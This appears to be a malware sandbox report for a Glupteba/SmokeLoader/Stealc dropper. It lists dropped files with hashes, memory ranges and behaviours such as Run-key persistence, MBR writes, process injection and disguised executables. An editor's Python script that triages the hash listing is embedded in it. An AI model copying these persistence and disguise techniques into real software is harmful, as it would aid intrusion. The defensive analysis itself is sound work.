SHA512 1d72ccdec9877d72079c2112787c6537884ba1f406a96915c32afea3aedc83c95ac0ee96c3b0700e35edd362ebe5e9f61377a9206f793aa0fc5a5346b2bf8099

C:\Users\Admin\AppData\Local\Temp\24EE.exe

MD5 c3ceed825749055413eadce8a18ff66f
SHA1 71f95696085d991caca438de6c27c7eb64cfc7b0
SHA256 c743f80a66cda81c8b45f986de004c42d0b84132edbc86973b34c6c49dd29f97
SHA512 2065d6994b1684b11db6226334fd092ff5f59a2ec7f4f8159e98cbe843b8276c8ccd3fec8a17c4879a7751e213990b49b234ac8ee38afa802bf7a7a94daff5aa

memory/60-150-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OUPSP.tmp\24EE.tmp

MD5 8fe7736caca3d3b55bd9123f7d5cd780
SHA1 68158e0909fced212d9076cc891953624e2b401d
SHA256 27821f0047bd4f5f8bfc4939bcb22c110e9de3a852f9589fb253b26b3ec25d94
SHA512 32c20f6f8a0c333dc1aff88bebdf5e46a93711e0e481af92c13156900874b7dfef584633e13761110031d0d52cbc062ba3749b0541a2adf98e1c80f0da264553

memory/2792-170-0x00000000001F0000-0x00000000001F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-604G4.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-604G4.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/3284-181-0x0000000003090000-0x00000000030A6000-memory.dmp

memory/1952-183-0x0000000000400000-0x00000000022D1000-memory.dmp

memory/4344-185-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/428-228-0x00000000043C0000-0x00000000043F6000-memory.dmp

memory/428-231-0x0000000006B20000-0x0000000007148000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3F7C.exe

MD5 00763268dd4d9f7c6bbfed6a5fa3f26c
SHA1 9004fe09813f2e4f74ec0e40e9837d2f8ac82d41
SHA256 d44d927239c1543c990abe4bb2fb3afd400f27db211d727b7ffde56417629a59
SHA512 683a4fcaef3ebc3fd33e8b8acda6004c33c851944bbe185d17b59e6fb8590bb1b759c7721d012bb97012fe7d5dbc4ed0ef80d427437ec066dad8c888cfcb8292

C:\Users\Admin\AppData\Local\Temp\3F7C.exe

MD5 a8900a925fa9d8bd1a9326f46cd6d95c
SHA1 f1233b2bf034565c4a860d27576d5d220e8eaa19
SHA256 6b77df3d92750657dbd110cf8b0178cb6de432a060891fcf33c43312fca418f7
SHA512 224584e6e138b2b820b135c94b48bdf322f7b40eb698bf837ec01dcc0b0c7fbbf9de55eb72ab9c2e945563ff703e2091a7a9f9b6e6437fbc712ea15c430f8587

memory/428-237-0x00000000722C0000-0x00000000729AE000-memory.dmp

memory/428-239-0x0000000004460000-0x0000000004470000-memory.dmp

memory/428-242-0x0000000004460000-0x0000000004470000-memory.dmp

memory/4700-245-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp

MD5 6698f78fe3d46ac9a812757612675ead
SHA1 12eb3adb1c533865496d5990adbdaaad9ed9b6de
SHA256 d60268179538cad1e29f69bc782537a7085a32bdde093c719e17cbfbc4b4ab60
SHA512 5e7788b7b69fc3c54a218197ffc1d4472658a512470486c349825792510f2585debd63299b7e2734f1e3310abb44c13b0634b95dd92f4d3842eccdee5346f792

C:\Users\Admin\AppData\Local\Temp\is-UJE7E.tmp\3F7C.tmp

MD5 dba29e46a02dfb0eb19133cd3288fbe3
SHA1 ab885ff9fe8f0a8e9cacd3e35cb1eaa5421e524f
SHA256 16a8f7bc097884a99c5e5344211c81163a0e1f3eb34eb5ca935bcc969830434f
SHA512 9d3fcdb48f74003b5ccf17cb2e3a87b39a062ac2bd87188ddabb5133724699bd7d4e948fd39d9ab4d2729941955bd008688079823c651a6aad8ab695dabfd44c

memory/428-250-0x0000000006AE0000-0x0000000006B02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AIMQF.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4084-265-0x00000000005D0000-0x00000000005D1000-memory.dmp

memory/428-266-0x00000000071C0000-0x0000000007226000-memory.dmp

memory/428-273-0x0000000007330000-0x0000000007396000-memory.dmp

C:\Users\Admin\AppData\Local\VSO Inspector\is-550C8.tmp

MD5 d9ede72fc13e4298727cd1359a9587e7
SHA1 563b08a9064b845c007260f9eb9201ef361280b0
SHA256 5f4c45fecd62b2e830d9269897fe52e63ab38ec0c43585fd8132a9b6faa5eb0a
SHA512 53372cbff01c9c9cc262417332a37d79e3b2d262e7fc60bb15741e48805dc0dbed7e657a291c3082e2356a3284abde2a2f4c879ef98bfe16a33d1263f6627125

memory/428-278-0x00000000074C0000-0x0000000007810000-memory.dmp

memory/428-282-0x0000000007870000-0x000000000788C000-memory.dmp

memory/428-283-0x0000000007BD0000-0x0000000007C1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnorqd2v.cpw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/428-312-0x0000000007E10000-0x0000000007E4C000-memory.dmp

memory/428-343-0x0000000008A40000-0x0000000008AB6000-memory.dmp

memory/428-355-0x0000000009810000-0x0000000009843000-memory.dmp

memory/428-357-0x0000000070970000-0x00000000709BB000-memory.dmp

memory/2056-356-0x0000000000A80000-0x0000000000A81000-memory.dmp

memory/428-359-0x000000007EC20000-0x000000007EC30000-memory.dmp

memory/428-358-0x00000000709C0000-0x0000000070D10000-memory.dmp

memory/428-365-0x0000000009850000-0x00000000098F5000-memory.dmp

memory/428-360-0x00000000097F0000-0x000000000980E000-memory.dmp

memory/428-368-0x0000000009A30000-0x0000000009AC4000-memory.dmp

memory/428-367-0x0000000004460000-0x0000000004470000-memory.dmp

memory/3720-366-0x00000000028F0000-0x0000000002CEC000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/428-582-0x00000000099C0000-0x00000000099C8000-memory.dmp

memory/428-577-0x00000000099D0000-0x00000000099EA000-memory.dmp

memory/3720-605-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/428-607-0x00000000722C0000-0x00000000729AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 b32bd2ff816a11f8152396aa8c5eb7a2
SHA1 140eb459ad802eee2d82d0bc18121e0e539efa16
SHA256 561157b38283fcc2b6739a944734a7a102b0c90b464b5bb34bcab72982bd08b9
SHA512 418c241105a5eb0d1833ce5df739775ef426f4ade9109e9cfa5f6e21f4742ccc051abeb47512a0e98668eee9debea8b27f97a5c8372cae8c44ec7595555ecbf8

memory/3720-611-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/2032-621-0x0000000002840000-0x0000000002C3F000-memory.dmp

memory/4344-624-0x0000000000400000-0x00000000022DC000-memory.dmp

memory/2032-625-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4344-626-0x00000000025F0000-0x00000000026F0000-memory.dmp

memory/748-627-0x0000000072310000-0x00000000729FE000-memory.dmp

memory/748-629-0x0000000006D10000-0x0000000006D20000-memory.dmp

memory/748-628-0x0000000007BC0000-0x0000000007F10000-memory.dmp

memory/748-631-0x0000000006D10000-0x0000000006D20000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 e745b8b7681f5ae25b09a7b1eb2f8fd3
SHA1 cd55c3fcf95d11f5d4fb4a75233dc69494f74d80
SHA256 5a7e3072d483e8dc341b902b937b53a379dc4080f08b54410c3c2046dd500538
SHA512 65ff6cfa6b416c099612e9f00399514d52264a4a58f8c63e2f78111805bf623eecded3d18c36dc1be5431aef50a1c192eaed6122e10d722e94325e6412d4298e

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d31f5caa7b1f882ab3a8b2d3289179ae
SHA1 ceab94db7eed78c957b3b9453d3f749414baeb3d
SHA256 c8f5e55d8316a5dad24074da13592e11e6bf260cbd6974bb3ff4a1e69f315476
SHA512 a7f02da60578fcf5143236893337742061cb4ab4c907263033555f918627e94abfdf5fe15348f2b7fd2d899bb18d2a7ec19a1a08d340699f7a4dea3893464867

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 a56180e6424bfcaf5de76cdbf5052ab5
SHA1 271e7031786a591ae83e228c68ce08170ac53b29
SHA256 c650b755c8817e7dbf412d7cd0e0ec23de26e5da4a9cd243226752c7aba4828a
SHA512 942e7f9f1231eb00b36467a453c63b8900f8a493f999d1c7a3c6b6a3539a6119fb66176f746cc7f591c7f6b80e685977e5bf3608092c96bc61aa91c8d37723a7

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 c853bf227d190e15bbbedd65e76201bb
SHA1 3c6da7a51307b2b75b71ef95718ad1bc4763b457
SHA256 d9d484af1f994e5bad38c1c4f664580a98d01a1eebb55473b0a4aebd1720b61e
SHA512 1ebe7a0b333abf71419cc644a182fd52a6375dab65c2fba34247df8b836ac5fc8c010bb762dabc7e7a58804330f4b43b884bdddf71cbbb8503d43fc4186370be

C:\Windows\rss\csrss.exe

MD5 b3bcc1386744e270b35551d84bdfbfbc
SHA1 bac703261ca8a0e732450d72a43794002365ae7d
SHA256 66c2848d6d0a169774befea101f52f213c34d79674978e542f1accfa6ffb14a8
SHA512 72219e79db99bea5c968ca4b3af8ab79b9eb2589b42081f4c99c97070a352695a0f5f2bb6d32e1bc9dd86397b110cf92632c016d5e28ff5b6471c6683887de44

C:\Windows\rss\csrss.exe

MD5 760fe387d7c560f53f0f9c728a66d3b0
SHA1 543c5b5f57e01ec1744b098ef24e52ed08d81e42
SHA256 aa9ec255d6b490b747edeaf60a5dd617411feae80944d62cc2276551e6095efc
SHA512 2b4d0a18ade76d12236c7a698e48a6875c85e3a9df61727f5070edf4f63d30af380bb40a1d647cb907af25bb2fec4ce6076e7a5d39944ac76e92594bc54522b7

C:\Windows\rss\csrss.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e6d242e410dd28991bb2a813af85a60c
SHA1 54e00665a7130bfae8fb804169cdd654631fdf5c
SHA256 904954e6d81fd220d76573fa0195c29dfadca16c3d3b5569af06064341379e07
SHA512 b214a68971ebf5185fe4c62a39511bce6f90db3f0d1080006f37adeeac13d6176277ea32798cf63d98e988967836f5ec9080728620d3e9ca5cbfb44b1c83723f

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 2780a31694c64d10e025d5b886193334
SHA1 864035b1e4c3d38a18ec1de156eb5223fb5bc983
SHA256 c077be3452533e54502d14f1fbeed586ca3eb9cbf8e56caa102c0bb5265ba70e
SHA512 ed832b6c75a857a66c254ed9af8021e153a558eb8fe33462f1dfae67107c97313dda13be7f28723d8223d5d327986d9f82cfd23a6ee4d29a9c33d33ad1969ded

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ae4a90af833411e7f370e7f45494dd04
SHA1 ffe23c17bc3d36bc31e377fdb80e1361cd85b2d8
SHA256 8af29985f05d9c9abc5dc675d35e81c13544396a1d735478c4bfd5a9e5702c00
SHA512 4bdd929e630a74be93b42f5ca89f45a781612e2255791c46ed4c5dc9ca4cc05179b7120427158d682d49b0d0be024fc159d70cf6eca159faa60d831a61bdc09c

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 a3c91e8f6bf36fa1d62759355ad065c4
SHA1 fb011aa1f9f00e42bb2cde1f4ba8b887fced4217
SHA256 0922b63a4ff2f91133c6cfd5f7a1b62fda2c3c464bc4c001033c8228abfb6b89
SHA512 93bdb814b4d84fc465c6ab07b66f967f06b4a6860fe692418c75475ac7e8085524196420a0e7b657412bb6d273aca63495df3bfa04a8b33cc1d9df8d4a9e43e7

C:\Users\Admin\AppData\Roaming\wfcvvwd

MD5 7394f4c6c1fd8d8dc1aa26e88959a08b
SHA1 1b20e4a51a66e4c82270e6669547bf47dd966fad
SHA256 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d
SHA512 e3946f65cd60d90d514fa156d0b5c2376ca25b25c73831739314b3537ff8075d98c6dabe020bde03b78ccf7f2862c56eaa08f9979ec6a5a536852b94ee7dd90c

C:\Users\Admin\AppData\Roaming\hucvvwd

MD5 f90585d064b169f106cd91c264019c22
SHA1 2ed3c35244831030343b303d3dc9acb6a8a4f4d3
SHA256 91a5a68c69045886ee486477b14935bb21a8b7cd830cb96a74a2b63836c98842
SHA512 e3a2253ea29868735f9940292d1526704f3aaa43ba815d217ef2adb49ec2d18c6616516e16b8fc38a0b40295777dce2fcaf10ad7bef0ec78444cc162e40fb2bd

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 93cd0bb96fdec3f5e161495df24eaaac
SHA1 f948a5a62072e2bb4767224685560dea108b8648
SHA256 d277eb3123c21467dfa5b85e41bf1c6b85d83f5aef8d2df9b991e7a9c0d8c064
SHA512 d2884dd10db65e9a6d621e7585e34402339a1feb61fbe95f7d039023f06f3bba8782a4da5a24d9ba9a02e40f46e346541fdf9d8c6778e2a1ce57ffcdd0b83aa2

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 93dfce7a88a4d13aefbaa828985ce399
SHA1 8ac5ba14bd07a39b3dfff07d11d68a4cced7fdd8
SHA256 f401abede674e9808706cf5c6887d647e736a6a7f17a6a19033ef7bfb1235b31
SHA512 5fc73ce4fb9b6818952f5efb85426e8b966b12d1d7b90fae01114d3d471b3b7fe5cebbbc1bcc13a6a261c1d24c2da893b4859862f0efddc330e0276e4ae7c4b8

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
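Three entries in the listing above say more than their paths do. One of the C:\Windows\rss\csrss.exe entries carries the MD5/SHA1/SHA256 of a zero-byte file (d41d8cd9…, da39a3ee…, e3b0c442…), so the file was created or truncated before its real contents were written. The __PSScriptPolicyTest_bnorqd2v.cpw.ps1 entry carries the hashes of the single character "1", the placeholder PowerShell writes to that probe file when it starts, which confirms PowerShell ran rather than indicating a dropped script. And C:\Users\Admin\AppData\Roaming\wfcvvwd has the same SHA256 as the submitted sample, i.e. the loader copied itself under a random name in %AppData%. The script below is an added example by this editor, not part of the report or of any sandbox's tooling: it parses an excerpt of the listing in the report's own layout (path line, then one line per hash algorithm; SHA512 lines are omitted from the excerpt only for length) and tags self-copies, recognisable contents and paths written more than once with different content. The path heuristic (any non-blank line that is neither a hash line nor a memory/ dump entry) is an assumption tied to this report format.

```python
import hashlib
import re
from collections import defaultdict

# SHA256 of the submitted sample, taken from the report header.
SAMPLE_SHA256 = "5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d"

# Excerpt of the Files listing above, copied in the report's own layout.
# SHA512 lines are left out of the excerpt for length; the parser accepts them.
LISTING_EXCERPT = r"""
memory/4300-87-0x0000000073200000-0x00000000738EE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 d3c015d761ac4697c31779ebd67685fe
SHA1 6eda243187265592a404feca52bf612ddc66e396
SHA256 689272ab8ec16e67eb0c14f37e0928b21b3cf38e467216ed1240177d82e5d7ea

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 05289f5848a855ff3d7a78b862498e26
SHA1 1021a66f15e425f33047d76a247680e916e736b0
SHA256 9c6d6f161b0253f9a78cd099ed0aa225b6ac00d3801859ff7405abd08b501407

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnorqd2v.cpw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

C:\Windows\rss\csrss.exe

MD5 b3bcc1386744e270b35551d84bdfbfbc
SHA1 bac703261ca8a0e732450d72a43794002365ae7d
SHA256 66c2848d6d0a169774befea101f52f213c34d79674978e542f1accfa6ffb14a8

C:\Windows\rss\csrss.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Users\Admin\AppData\Roaming\wfcvvwd

MD5 7394f4c6c1fd8d8dc1aa26e88959a08b
SHA1 1b20e4a51a66e4c82270e6669547bf47dd966fad
SHA256 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d
"""

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$", re.I)
ALGOS = {"MD5": hashlib.md5, "SHA1": hashlib.sha1,
         "SHA256": hashlib.sha256, "SHA512": hashlib.sha512}

# File contents worth recognising on sight. "1" is the placeholder PowerShell
# writes to its __PSScriptPolicyTest_*.ps1 probe; an empty file is a stub.
KNOWN_CONTENT = {b"": "empty file", b"1": "PowerShell script-policy probe"}


def parse_listing(text):
    """Return [(path, {algo: hexdigest})] in listing order, skipping memory dumps.

    Assumption about the report layout: a path line is any non-blank line that is
    neither a hash line nor a memory/ entry, and hash lines belong to the path
    line most recently seen."""
    entries, current = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m:
            if current is not None:
                current[1][m.group(1).upper()] = m.group(2).lower()
        elif line.startswith("memory/"):
            current = None          # memory dump entries carry no hashes
        else:
            current = (line, {})
            entries.append(current)
    return entries


def matches_content(hashes, content):
    """True when every hash recorded for an entry equals the hash of `content`."""
    return bool(hashes) and all(
        ALGOS[algo](content).hexdigest() == digest for algo, digest in hashes.items())


def triage(entries, sample_sha256=SAMPLE_SHA256):
    """Tag each path: self-copy of the sample, recognisable content, or a path the
    detonation wrote more than once with different content (staged overwrite)."""
    tags, seen = defaultdict(list), defaultdict(set)
    for path, hashes in entries:
        sha = hashes.get("SHA256")
        if sha:
            seen[path].add(sha)
        if sha == sample_sha256:
            tags[path].append("self-copy of submitted sample")
        for content, label in KNOWN_CONTENT.items():
            if matches_content(hashes, content):
                tags[path].append(label)
    for path, digests in seen.items():
        if len(digests) > 1:
            tags[path].append("written %d times with different content" % len(digests))
    return dict(tags)


if __name__ == "__main__":
    for path, labels in triage(parse_listing(LISTING_EXCERPT)).items():
        print(path, "->", "; ".join(labels))
```

The hashes of the known contents are computed with hashlib rather than hard-coded, so the check holds for whichever of MD5, SHA1, SHA256 or SHA512 the report happens to list. Entries that an IOC feed would otherwise ingest as "malicious hash" (the empty csrss.exe, the PowerShell probe) are exactly the ones this filters out.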

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 04:48

Reported

2024-02-23 04:53

Platform

win7-20240221-en

Max time kernel

46s

Max time network

306s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\A083.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\C094.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2672 set thread context of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
(62 further hits with no description, indicator, process or target recorded)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
